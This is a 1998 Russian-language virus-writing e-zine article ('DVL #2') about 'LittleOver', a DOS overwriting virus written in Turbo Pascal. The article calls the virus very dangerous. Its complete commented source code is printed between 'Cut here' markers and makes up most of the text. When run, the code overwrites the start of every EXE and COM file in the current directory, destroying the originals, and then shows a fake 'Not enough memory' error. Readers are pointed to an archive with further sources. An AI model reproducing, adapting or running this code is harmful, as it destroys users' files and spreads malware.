[40m[2J[40m
[0;1m[32C[0;1;35mD V L  # 2

[27C[0;1;33mHLLO.LittleOver.2688
[30C(c) by Duke/SMF

[0;1;34mИмя вируса    : [0;1;36mLittleOver version 1
[0;1;34mАвтор[9C: [0;1;36mDuke/SMF
[0;1;34mДата создания : [0;1;36m28.09.98
[0;1;34mДлина[9C: [0;1;36m2688 байт
[0;1;34mТип[11C: [0;1;36mHLLO

[0;1mОчень опасный нерезидентный неполиморфный файловый вирус. Написан на  [0;1;32mTurbo
Pascal 7.0[0;1m. Записывается в начало всех [0;1;32mEXE [0;1mи [0;1;32mCOM [0;1mфайлов текущего  каталога,
не сохраняя оригинального содержимого файлов и не изменяя размер файла. Пе-
ред заражением на файл устанавливается атрибут "[0;1;32mАрхивный[0;1m". Очень  примитив-
ный (не проверяет на повторное заражение) и имеет малый размер. Содержит  в
теле строку "[0;1;32m[LittleOver, Duke/SMF][0;1m", которая на экран никогда не  выводит-
ся. В конце работы выдает сообщение "[0;1;32mNot enough memory[0;1m". Я привожу его  как
пример самого маленького вируса на паскале.

[0;1;31m===== Cut here =====
[0;1m{$I-,S-}[25C{используются для уменьшения кода вируса}
uses dos;
const len=2688;[26C{длина вируса}
var vir   : file;[24C{запущенный вирус}
    mas   : array[1..len] of byte;[7C{массив с телом вируса}
{--------------------------------------}
procedure Infect(i:string);[14C{Заражение файлов}
var g:file;
begin
assign(g,i);
setfattr(g,$20);[25C{установка атрибута Arhive}
reset(g,1);[30C{открыли файл-жертву}
blockwrite(g,mas,len);[19C{записали поверх вирус}
close(g);[32C{закрыли жертву}
end;
{---------------------------------------}
procedure Find(st:string);[15C{Поиск файлов в текущем каталоге}
var s:searchrec;
begin
findfirst(st,$21,s);
while doserror=0 do
  begin
  Infect(s.name);
  findnext(s);
  end;
end;
{---------------------------------------}
begin
assign(vir,paramstr(0));reset(vir,1);[6C{открыли файл с вирусом}
blockread(vir,mas,len);[20C{считали вирус в память}
close(vir);
Find('*.exe');[29C{поиск *.exe}
Find('*.com');[29C{поиск *.com}
{--- Я допустил вставку на ASM'е так как}
{--- без нее вполне можно было обойтись}
asm
[7Cjmp  @Next
[7Cdb   '[LittleOver, Duke/SMF]',0[5C{copyright вируса}
@TXT:  db   'Not enough memory$'
@Next:[37C{вывод строки на экран}
[7Cpush ds
[7Cpush cs
[7Cpop  ds
[7Cmov  dx,offset @TXT
[7Cmov  ah,9
[7Cint  21h
[7Cpop  ds
end;
end.
[0;1;31m===== Cut here =====
[37m Исходники смотрите в файле "dvl2-06a.zip"
[1;35m                            The End of File